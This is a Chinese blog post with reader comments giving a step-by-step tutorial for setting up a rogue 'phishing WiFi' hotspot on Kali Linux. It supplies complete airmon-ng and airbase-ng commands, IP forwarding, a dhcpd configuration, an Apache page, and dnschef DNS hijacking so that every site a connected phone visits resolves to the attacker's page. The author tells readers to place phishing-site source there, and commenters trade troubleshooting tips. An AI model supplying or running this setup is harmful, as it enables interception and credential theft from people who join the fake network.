疫情来袭,在家无聊,写篇博客解解闷。
搭建钓鱼wifi,这里我用的是kali系统,如果你有一个外置usb无线网卡,那么恭喜你,可以在虚拟机安装kali就可以。如果你恰好和我一样没有外置无线网卡,那就只能把kali安装到物理机了(注意一定要记得==分区!分区!分区!==)
具体怎么安装到物理机,有时间在给大家讲讲
0.首先,把网卡切换到监听模式并创建热点
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0 //建立监听
这里的wlan0是自己的无线网卡,可以输入ifconfig查看
(最后一条命令多执行几次,直到ifconfig出现wlan0mon)
然后创建一个名为CCDX的热点
airbase-ng -e CCDX -c 11 wlan0mon
出现这样,唉说明你创建热点成功了(这时这个窗口不要关)
这时用你的手机就可以搜到名为CCDX的热点但无法连接,因为没有分配ip
1.建立虚拟网卡并打开ip转发
这一步的意义是将这张网卡的流量转发到虚拟网卡上
(注意,这是要重新打开一个终端,因为之前那个终端已经用来开启热点了)
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
创建一个虚拟网卡at0并设置ip,子网掩码和网关
2.配置dhcp服务器
这里使用dhcpd来作为dhcp服务器
vim /etc/dhcp/dhcpd.conf
在dhcpd.config里复制粘贴以下内容
authoritative;
default-lease-time 700;#默认租约时间
max-lease-time 8000;#设置最大租约时间
subnet 10.0.0.0 netmask 255.255.255.0 { #设置子网属性,netmask关键字指定子网掩码
option routers 10.0.0.1; #指定为客户机分配的默认网关地址
option subnet-mask 255.255.255.0; #指定为客户机分配的子网掩码地址
option domain-name-servers 10.0.0.1;#设置DNS服务器地址
range 10.0.0.10 10.0.0.100; #设置动态分配的IP地址范围
}
具体配置解释已经注释在配置中,需要一点网络基础,如果不懂就直接复制粘贴吧
然后启动dhcp服务器
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
出现以下,就说明启动成功了
3.搭建钓鱼网站
这里使用apache搭建
网站路径在/var/www/html/下
到时候把钓鱼网站的源码放在这里就行
这里新建一个index.html做测试用
<font size="20" color="red"> You've been hacked !!!!!!!!!!!!</font>
<br><br>
<font face="verdana" color="green">created by yuaneuro</font>
然后启动apache服务
service apache2 start
访问127.0.0.1即可看到
4.劫持DNS
那么如何让连到我们钓鱼wifi的人访问这个网页呢,这是就是需要dns来发挥作用
众所周知dns的作用是把域名解析成ip,前面用dhcp分配ip的时候就已经吧dns服务器指向本机了
这里不需要再搭建dns服务器了,dnschef将是一个很好的工具
dnschef -i 10.0.0.1 --fakeip 10.0.0.1
这条命令的作用是监听10.0.0.1并将所有域名泛解析成10.0.0.1也就是本地
5.至此,现在就可以用手机去测试了
可以看到我的ipad已经连接到我的钓鱼热点
并已经自动获取到我们设置的ip和dns
无论你输入什么网站都会自动跳转到我们的界面
6.结束
如果有什么不懂的地方可以问我,共同进步
25 条评论
按照流程走完之后,手机能够连接钓鱼热点,但是无法访问互联网,输入10.0.0.1也打不开。请问是什么问题?应该怎么解决?求解答,谢谢
看看hdcp配置是否正确,手机有没有获取到你分配的ip地址和dns地址
yuaneuro哥乱杀
文章不错关注一下
按照流程走完了,但是连上wifi显示无法访问此网站,访问10.0.0.1会跳转到index.html
因为他没有将教你如何穿透,所以你只能在局域网中测试
你好,ifconfig找不到vlan是什么原因?
晨哥牛逼
文章中的 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
这里面的dhcod.pid 是什么??我这边找不到这个文件
大佬,请问有没有推荐的京东在售无线网卡啊OωO
按照教程来的为什么还是连不上热点 手机一直显示正在获取ip
我尝试了把流量转发到建立的AP上发现怎么都没有办法上网,不知道什么原因
使用
iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
将无线网卡的流量转发到有线网卡上还是无法上网呀
输入ifconfig后wlan0后面好多,那一个才是无线网卡呀,本人小白
一般是和你路由器同一网段的那个
大佬请问Wi-Fi配置后始终显示已连接但无法访问互联网是什么原因,是因为网卡的质量不好吗?经常连不上,连上偶尔能动的时候也特别慢。
如果排除时dhcp的原因那就是网卡的问题
一般kali不带dhcp服务,这里一笔带过了,不过还好
写这篇文章时是复现之前的操作,可能有些地方想的不是很周到
厉害
这可还行
有空多来看看